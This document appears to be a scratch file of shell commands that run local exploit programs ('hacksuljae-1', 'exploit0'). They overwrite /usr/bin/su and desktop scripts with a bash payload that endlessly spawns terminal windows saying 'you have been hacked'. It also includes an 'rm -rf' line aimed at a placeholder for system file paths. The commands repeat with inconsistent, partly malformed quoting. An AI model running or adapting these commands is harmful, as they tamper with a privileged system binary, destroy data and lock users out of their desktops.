./hacksuljae-1 /usr/bin/su 1 $\n'#!/bin/bash\nwhile true; do\ngnome-terminal -- bash -c \'echo \"you have been hacked\"; read -p \"Press Enter to continue or \"\'\ndone\n//' && sed -i '1d' /usr/bin/su

./exploit0 /home/ahn/Desktop/test0.sh 1 $\n'#!/bin/bash\nwhile true; do\ngnome-terminal -- bash -c \'echo \"you have been hacked!\"; read -p \"Press Enter to continue or \"\'\ndone\n//' && sed -i '1d' /home/ahn/Desktop/test0.sh
#!/bin/bash
rm -rf "시스템파일 경로"

./hacksuljae-1 /home/test/Desktop/test.bat 1 $'#!/bin/bash\nwhile true; do\ngnome-terminal -- bash -c \'echo \"you have been hacked!\"; read -p \"Press Enter to continue or \"\'\ndone\n//' && sed -i '1d' /home/ahn/Desktop/test0.sh

./exploit0 /home/ahn/Desktop/test0.sh 1 $\n'#!/bin/bash\nwhile true; do\ngnome-terminal -- bash -c \'echo \"you have been hacked!\"; read -p \"Press Enter to continue or \"\'\ndone\n//' && sed -i '1d' /home/ahn/Desktop/test0.sh
#!/bin/bash
rm -rf "시스템파일 경로"

./exploit0 /home/ahn/Desktop/test0.sh 1 $'#!/bin/bash\nwhile true; do\ngnome-terminal -- bash -c \'echo \"you have been hacked!\"; read -p \"Press Enter to continue or \"\'\ndone\n//'
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

./hacksuljae-1 /home/test/Desktop/test.bat 1 $'#!/bin/bash\nwhile true; do\ngnome-terminal -- bash -c \'echo \"you have been hacked!\"; read -p \"Press Enter to continue or \"\'\ndone\n//' && sed -i '1d' /home/test/Desktop/test.bat
